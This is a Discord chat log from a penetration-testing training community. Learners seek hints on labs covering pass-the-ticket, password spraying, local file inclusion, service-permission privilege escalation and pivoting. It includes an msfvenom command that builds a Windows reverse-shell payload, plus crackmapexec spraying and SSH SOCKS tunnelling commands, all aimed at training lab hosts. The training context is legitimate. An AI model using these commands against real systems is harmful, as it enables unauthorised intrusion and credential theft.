Hi! I need some clarification on the content in [Password Attacks] Pass the Ticket (PtT) from Windows.
In the module, under Rubeus - PowerShell Remoting with Pass the Ticket, Creating a Sacrificial Process with "createnetonly" was mentioned.
I understand that this is to prevent erasure of existing TGTs for the current logon session. However, I don't understand the use case. From my understanding, assuming I have access to a local account, this account would not have anything to do with Kerberos TGTs. If I utilise PtT to gain access to a domain user (john's) context, I'm supposedly overwriting a TGT (which I assume local accounts have nothing to do with). Hence, my confusion is in this use case of Sacrificial Processes.

fathom pendant
#

Domain users inherently use tickets to logon

#

It's how kerberos works

#

If it's a truly local account. It needs to interact with kerberos in some way

earnest sequoia
# fathom pendant Domain users inherently use tickets to logon

I understand that we get the tickets to logon. I don't understand when we have to use sacrificial processes (Rubeus "createnetonly").

Is it not the case that the interaction with kerberos should be via the Rubeus.exe application? In a truly local account, I shouldn't be afraid of any TGT overwriting in that case

fathom pendant
#

What if the account you're on isnt local

earnest sequoia
cerulean coyote
#

I am stuck on Password Attacks Lab - Hard. I have cracked johanna's rdp password and logged on to the target. I downloaded the keepass file with evil-winrm and cracked the password. I opened the protected file and got the d... user and password. I have tried to use logon with rdp using d's password - no success. I have tried using smbclient with johanna's creds and d's creds - no success. I have looked for other files but can't find anything useful. I have tried using d's creds to get admin rights to look in d's folder, or dump SAM or LSASS - no success. I need some hints on where to go from here, please

fathom pendant
cerulean coyote
#

On smb or rdp? Neither one works for me.

fathom pendant
#

Make sure you copied it correctly

#

Smb should work

#

Password should be g..7

cerulean coyote
#

Perhaps I am using the smbclient command wrong. I have tried copying and typing the password. No success. Here is the command I am using: smbclient \\10.129.202.222 -U david then I put in the password g..7 All I get is NT_STATUS_NOT_FOUND

fathom pendant
#

Also you can do // instead of \\\\

cerulean coyote
#

oK. Well, I could have sworn I did all that already, but now it seems to be working fine this time around. I'm on the share. Thank you!

fathom pendant
#

Np

#

You're on the home stretch

cerulean coyote
#

That's good because I am pretty tired of this module. For some reason, it is kicking my butt although nothing in the material is all that complicated.

fathom pendant
#

Tbh this will require some research. Mounting is the hard part, plenty of articles though -- shared in this channel too

fossil crescent
#

(a) thank-you, (b) while I found it [largely due to this], and knowing the answer now, I can see where the course author was going, still feel like it's making a bit of a leap... now, maybe if it were say the first question of the first section in this module, it'd make a lot more sense, but going all this time... (for me at least) leads to a preconcieved notion on expected behavior of the app (IMHO). Anyhow, thx again for your respose to the other person who had the same challenge.

worn matrix
#

anyone else have problems with information gathering,at archive.org ?

fathom pendant
#

If you do a search in the discord you'll see that question asked and answered a few times

worn matrix
#

thanks!

barren crystal
#

Is bug bounty path just a stripped down Pen test one btw?

#

Or are there module in bug bounty one pen test one doesn’t have

next bronze
#

there are cbbh specific modules

fathom pendant
barren crystal
fossil crescent
#
EDIT: Nevermind, just got ahead of myself... but all I can say is if I am on the right track, good luck to those who haven't done it yet...  but a very, Very, VERY subtle nudge, reads like a bad dad joke... (well, not really a nudge, but will make sense when you get it)
onyx halo
#

Guys <dumb q> is there a dotnet decompiler for linux?

fathom pendant
#

Vscodium probably

onyx halo
#

ok ty

fossil crescent
onyx halo
#

yes went over bunch

#

Thanks!

onyx halo
fossil crescent
# onyx halo yes went over bunch

Fair enough -- I didn't try it, I thought to myself (when reading your question, I don't know myself and now curious... so googled... and then... yeah. But if you tried them and they didn't work, then fair enough

fathom pendant
#

Sometimes windows doesn't like things that aren't compiled in windows

rain nebula
#

Where's a good place to point out small inaccuracies in a module?

rain nebula
sudden plover
#

I’m stuck on the final question of Kerberos Attacks - Skill Assessment module.

I already have SERVER01 and login as system privileges, then I use rubeus monitor and try spoolsample.exe. dc01.inlanefreight.local server01.inlanefreight.local, but it appears to be not working for dc01, is there anything I'm missing? Please help for guidance. Thank you

next bronze
sudden plover
civic hamlet
#

"How many files exist on the system that have the ".log" file extension? " Linux fundamentals

#

Im getting different numbers. 508, 507, 506

#

now im getting 504?

#

find / -type f -user root -name "*log" 2>/dev/null | wc -l

fathom pendant
#
  1. You don't need the -user flag
  2. are you ssh into the target
  3. you need to search for *.log
civic hamlet
young spade
#

@storm elk Hi there, Can i DM you for the advanced SQL injection in the last flag?

rustic sage
#

I can't type * without dc making everything italic

white shale
#

Hi

#

anyone knows why i can't send messages in #general ?

cloud urchin
#

you need to read and complete the actions in #welcome

white shale
#

thx

inner geyser
#

Hoping someone wouldn't mind verifying they can get a reverse shell on "Windows Privilege Escalation - Weak Permissions". First attempt (a long time ago) I got a shell that immediately died..haven't been able to get a shell since. Changed VPNs multiple times, went back to the previous section to get a reverse shell again just to make sure I wasn't having a netcat issue. Working through the 'SecurityService' steps in the module should be providing the shell, so I'd just like someone to confirm if there's an issue with the lab or me. I've gone in circles on this for too long, so any verification would be amazing

civic hamlet
#

oh nevermind

next bronze
inner geyser
#

tried msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.21 LPORT=4444 -f exe > SecurityService.exe and also msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.229 LPORT=4444 -f exe > SecurityService.exe (dont' mind the IP change -- that was before/after VPN switch)

civic hamlet
#

So "*log" Gets all files that have log and the log extention

rustic sage
#

Ye

civic hamlet
#

while ..log gets files with only log extension

#

i see, thanks!

rustic sage
#

Which is why you got like 500 matches

next bronze
#

oh you did

inner geyser
#

yeah i've tried both multiple times across multiple VPNs

next bronze
#

hmm let me check

inner geyser
#

ty

uneven oracle
#

I’m stuck on the Skills Assessment in the File Inclusion module 😒

I’ve gone through the entire module multiple times and have gotten all the flags multiple times, but none of these techniques seem to be working on the Skills Assessment target application.

rustic sage
inner geyser
#

no, and I wasn't on the previous module either but still got a shell on netcat

rustic sage
#

Try listening with metasploit and see if you do get a shell

next bronze
inner geyser
#

yeah although believe i tried cmd prompt earlier as well but it's been so long i can't remember. 99% powershell

next bronze
#

and you don't see any output after you ran it?

inner geyser
#

no output

next bronze
#

for powershell use sc.exe

#

you should see something shows up

inner geyser
#

yeah that's how it worked in the previous section as well (dll instead of exe) but you could tell something executed. Appreciate the input. I basically logged out for the evening but i'll give that a try tomorrow

uneven oracle
#

Anyone complete the File Inclusion module?

next bronze
vague pewter
uneven oracle
#

None of the LFI techniques seem to work.

rustic sage
#

What specific task are you struggling with

real delta
uneven oracle
uneven oracle
next bronze
#

first try to get the page source, then use that to find how to get rce

uneven oracle
uneven oracle
uneven oracle
next bronze
next bronze
#

through lfi

#

php code won't be displayed if you're viewing it on the client side

uneven oracle
rustic sage
uneven oracle
#

Curl?

uneven oracle
rustic sage
#

How do you know if LFI is working on your target in the first place?

real delta
rustic sage
#

Like if it's vulnerable

#

Did you test?

uneven oracle
cloud urchin
uneven oracle
uneven oracle
cloud urchin
#

okay, so you can successfully read files on the server then?

uneven oracle
#

Adding to the end of the url, encoding, ect

real delta
uneven oracle
#

None of the lfi tpworked.

rustic sage
#

I don't really understand what you're saying

cloud urchin
#

you may also want to go over "PHP Filters" again, there's a section in there for source code disclosure

real delta
#

we can't help you if you don't elaborate more

uneven oracle
uneven oracle
real delta
#

look at what it filters and what it doesn't

uneven oracle
rustic sage
#

@uneven oracle here are a list of payloads to test if LFI works and you can go on from there

cloud urchin
rustic sage
real delta
uneven oracle
real delta
#

also try removing the # character, no files in linux have a #

uneven oracle
cloud urchin
#

you can lead a horse to water..

rustic sage
#

Remember, LFI is just accessing local files stored on the server

uneven oracle
#

I originally didn’t have it there.

next bronze
#

read the PHP Filters section and try the techniques please

uneven oracle
uneven oracle
next bronze
uneven oracle
next bronze
#

whatever you've tried is not even in the PHP Filters section...

real delta
uneven oracle
real delta
cloud urchin
#

no, that's not it Ceald

#

he took the base64 string from the skill assessment of that module and put it into the request

uneven oracle
next bronze
#

if you can't get LFI working the first place, why go to RCE?

cloud urchin
#

Solemn_1 I would suggest slowing down, re-reading the php filters content section, and really trying to understand it. you're trying to local file include a base64 string, so you're trying to read that string on the server. why do you think there's a file with that string in there?

rustic sage
#

Yeah lol

uneven oracle
cloud urchin
#

PHP Filters, not Wrappers...

rustic sage
uneven oracle
wary plover
uneven oracle
cloud urchin
#

they are not the same. unless they changed the module recently, php filters and php wrappers are two separate sections. you're not doing it correctly.

next bronze
#

nope I've just tried it

uneven oracle
next bronze
#

buddy if you're just here to get someone to do the module for you, that's not gonna happen

rustic sage
#

It's literally detecting your payload

next bronze
#

I'll say again, read the PHP Filters section and try the techniques please

uneven oracle
next bronze
#

specifically, the PHP Filters section

bitter widget
#

having problems with metasploit academy. im getting Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.

uneven oracle
cloud urchin
#

there's an entire section called php filters

cloud urchin
#

look at the table of contents on the right

real delta
uneven oracle
cloud urchin
rustic sage
uneven oracle
ocean night
real delta
next bronze
ocean night
#

Oh, they're on the assessment, ok.

uneven oracle
uneven oracle
#

The “filters” sections shows how to scan for params and how to read source code of that page.

wary plover
uneven oracle
wary plover
uneven oracle
cloud urchin
uneven oracle
next bronze
#

yeah it's rce

uneven oracle
cloud urchin
uneven oracle
cloud urchin
#

i did..

ocean night
#

They're trying to

next bronze
#

we helped you get started

uneven oracle
ocean night
#

You're not going to get handed the answer - the idea of Academy is to work through the sections of a module, learn from them and build your knowledge, and apply that knowledge to the skills assessment.

uneven oracle
ocean night
#

If you're struggling, you may want to go through the sections once more, and make some notes

ocean night
#

🤷‍♂️

uneven oracle
ocean night
#

It's all about using the techniques learned in the sections, and applying them to the assessment which is solvable using the techniques taught throught the module

uneven oracle
#

@fathom pendant is good at helping without exactly giving me the answer.

uneven oracle
cloud urchin
uneven oracle
#

I’ve gotten all the other flags in the section.

fathom pendant
uneven oracle
ocean night
#

Taking a break is often useful. You sound like you're getting frustrated, and that really doesn't help in finding the correct path. Everyone here has been doing their best to help with a gentle nudge. I'm not sure what else to say.

steady tusk
#

guys please

ocean night
#

No @steady tusk

uneven oracle
cloud urchin
# steady tusk guys please

no one here can help you with that, you'd need to reach out to the website/service that provides the account

uneven oracle
next bronze
rustic sage
uneven oracle
uneven oracle
next bronze
#

if you're not happy with the help you're getting, feel free to complete it yourself

uneven oracle
fathom pendant
rustic sage
# uneven oracle Stfu

Listen bro no one's gone straight up give you step by step guidance to the answer. You're not gonna be able to figure anything out irl if you don't train yourself to figure shit out yourself.

fathom pendant
cloud urchin
rustic sage
uneven oracle
fathom pendant
#

dude; i'd be saying the same thing

uneven oracle
fathom pendant
#

the block button exists yk

vague pewter
#

you're frustrated, I get that but pls be kind :)

#

Candy is trying to guide you to the answer

#

they're a sweetheart

uneven oracle
vague pewter
fathom pendant
#

haven't done this module so can't tell ya

uneven oracle
vague pewter
#

alright which module I've got a silver sub Ill try and help out

uneven oracle
uneven oracle
vague pewter
#

bet gimme a sec

storm elk
#

I’ll check my notes when I get on my pc in an hour

#

I finished cbbh in may

vague pewter
#

have u tried log poisoning?

fathom pendant
#

put the full vhost name

uneven oracle
fathom pendant
#

blog.inlanefreight.local

#

also make sure the LHOST is set to the right interface if it's got a listener

vague pewter
#

alright here's what we're gonna do

#

we're gonna find ourselves a lfi payload list, and throw that baby on this box

#

that's how I passed my oswe, trust it'll wokr

uneven oracle
#

There is one technique that “may” work to help traverse the file system, but I don’t think I am executing it correctly.
How can I execute this?

uneven oracle
next bronze
#

can you read the page source carefully for more information

vague pewter
#

oh wait I have silver annual I can see the solution kek I wont give you the answer but Ill nudge u in the right direction

uneven oracle
vague pewter
#

Okay I got it, now walk me through it, what have you tried so far, be patient, list everything, Ill guide you and tell you what you're missing

ocean night
#

Can you guys take it to DM please?

uneven oracle
wary plover
#

Wooow

vague pewter
#

damn

ocean night
#

This is a Tier 1 module. Spoilers for any module over Tier 0 are not permitted.

ocean night
#

Please go to DM.

vague pewter
#

Okie doke, I wanted to keep it public so it'd be known I didnt outright give out the answer :p

ocean night
#

Thanks, I understand

uneven oracle
vague pewter
uneven oracle
vague pewter
#

also lets take this to dms

ocean night
#

@uneven oracle - this is no longer a request.

vague pewter
ocean night
#

Someone is trying to help you. I am politely asking you to take it to DMs

uneven oracle
ocean night
#

I advise you to do so

vague pewter
#

let's take this to dms

#

I wont be helping you here, talk to me in dms otherwise I cant help

uneven oracle
vague pewter
#

orders from up top, my hands are tied

fathom pendant
wary plover
ocean night
#

We're not being hostile, please take a breath, calm down and accept the help.

uneven oracle
ocean night
#

Well.. fuck

#

I had the wrong tab open

#

Sorry @uneven oracle

uneven oracle
ocean night
#

Feel free to continue

uneven oracle
fathom pendant
#

even still given the nature of wanting the direct solution

#

¯_(ツ)_/¯

vague pewter
#

probably shouldnt be that mean 😅

uneven oracle
uneven oracle
vague pewter
uneven oracle
vague pewter
#

but I assure you that everyone in this server harbours no malice towards you, and genuinely does want to be of service

void hemlock
#

Module: AD Trust Attacks
Section: Skills Assessment
Issue: I am having an issue with the chisel server on Child-DC, I've checked the config of /etc/proxuchains.conf and it's correctly routing through the proxy. I tried to ping DC.inlanefreight.ad but I don't get any response. When I ping it from child-dc, I get an ping reply. Can anyone help me?

next bronze
#

have you done the module?

vague pewter
#

oh wait nvm I dont even have the module unlocked kek

#

I thought it was included in silver annual

next bronze
#

buddy don't just read off the included answers, you aren't helping anyone

#

imo

vague pewter
next bronze
#

what if it's not in the answer and requires understanding of what needs to be done?

#

anyways

next bronze
vague pewter
ocean night
#

Chill, it's fine to discuss here. It's a Tier 0 module. Ideally guiding to the answer is the best way, which is what MV is trying to do.

vague pewter
#

if I feel like I dont know something I wont talk

ocean night
#

I fucked up.

next bronze
#

that's a tier 3 sir

cloud urchin
ocean night
#

Ohhh

void hemlock
ocean night
#

Well then

real delta
wary plover
ocean night
#

I think I might just shut up. Have a good day everyone.

next bronze
vague pewter
#

see @next bronze im helpful

void hemlock
uneven oracle
wary plover
ocean night
vague pewter
next bronze
void hemlock
void hemlock
next bronze
#

socks 4 is not 1080 btw, that's socks 5

void hemlock
next bronze
#

socks5 127.0.0.1 1080

void hemlock
autumn pilot
#

if you want to show off you can use a similar approach

sed -i s/socks4/socks5/g <config_file>
storm elk
#

@uneven oracle , if you are still stuck, feel free to dm me

jolly yacht
#

Hey, In Windows Fundamentals module, i tried to rdp into the given machine in the sections but i can't able to connect into that. I tried this from the pwnbox as well as my vm which was connected to the vpn but it still can't connect to it. i tried to reset the rdp machine and after if i try to connect that it connect for like few seconds and disconnected by showing some error. Additionally i tried to change the server though but still same error. Any help please?

autumn pilot
#

What is the command you are using

fathom pendant
#

try adding /timeout:60000

jolly yacht
autumn pilot
#

make sure you are connected to the vpn, additionally, you can try enclosing the password within single quotes

stark lark
#

What are the benefits of meterpreter port forwarding instead of meterpreter tunneling?

stark lark
fathom pendant
#

Tunneling can allow it, with some clever port forwarding

mint peak
#

4.5 more modules before completion. Been a busy two weeks getting this all done pepehands

stark lark
idle sigil
#

Hey, for the module - Port Forwarding with Windows Netsh - I cannot rdp into the htb-student account. The connection keeps timing out

#

am i doing something wrong here?

coarse bane
#

I still have question for Attacking common services (SQL), someone interested to discuss?

idle sigil
wraith pelican
eager siren
#

I am in the ATTACKING COMMON SERVICES - Attacking FTP. I am cuurently running nmap <IP> and i only get the followin open ports: 22, 53, 139, 445, no port related with ftp. I also run a nmap scan on port 21 and 2121 beacuse i though the migth be not visible, <hidden> but the state of them is closed. what might be the problem?

mint peak
grand pivot
#

Module: Pivoting, Tunneling, and Port Forwarding
Section: Dynamic Port Forwarding with SSH and SOCKS Tunneling
Question: Apply the concepts taught in this section to pivot to the internal network and use RDP (credentials: victor:pass@123) to take control of the Windows target on 172.16.5.19. Submit the contents of Flag.txt located on the Desktop.

Port 3389 for RDP is closed so I'm unable to use it. I've tried resetting the machine several times and have made sure to wait 3-5 minutes to let everything in the machine to be configured. Is there a solution for this is issue?

candid lily
#

people who use cherrytree, it is possible to batch convert ctb into pdf

oak girder
#

May I ask if this is changed into the middle of the picture

sterile solstice
oak girder
#

Hello? Is anybody there?

#

I can pay you $2,I hope someone can help me

acoustic owl
# oak girder I can pay you $2,I hope someone can help me

You don't have to pay anything.
When it comes to fatty, I recommend you watch the video from IppSec https://www.youtube.com/watch?v=3bvKLj0akMM

00:00 - Intro
02:10 - Using wget to recursively download files off an annonymous FTP Server
06:00 - Attempting to execute the Java Thick Client, then switching to Java version 8 and trying again
08:00 - Seeing the Thick Client makes some DNS Requests, make the DNS Request resolve and attempt to intercept with Burp
11:00 - BurpSuite failed us, us...

▶ Play video
oak girder
#

I looked at this and I saw that he did not recompile, but forwarded the port directly

#

There is a difference between Powershell for linux and Windows

acoustic owl
#
uneven oracle
#

There is something wrong with the curl. Idk lol.
How do you properly add a user agent to a curl command?

oak girder
#

Ha, ha, ha. I've seen all of them

sterile solstice
acoustic owl
uneven oracle
uneven oracle
sterile solstice
#

glad it worked 🙂

uneven oracle
sterile solstice
#

haha thats good. it can definitely get frustrating lol

idle sigil
#

Hey, I am at the module "DNS Tunneling with Dnscat2 " and am following the instructions for installing dnscat2. But when I ran 'sudo bundle install' i get the sh3 error 😦

I've been googling for solutions for the past 30mins but cannot find one 😦 Can anyone please help me with this? Thank you

next bronze
#

it's not very practical and you'll likely not use it

burnt grail
#

AD Enumeration & Attacks - Skills Assessment Part II

Im trying to do a password spray using crackmapexec, I set up dynamic pivoting using ssh -D, but for some reason, crackmapexec keeps giving me this error

Even when trying to do it without pivoting, from the host to the pivoting target, it still gives the same error

Command used for dynamic port forwarding: ssh -D 1080 htb-student@ip
Command used for passwordspray: crackmapexec smb 172.16.7.3 -u users.txt -p Welcome1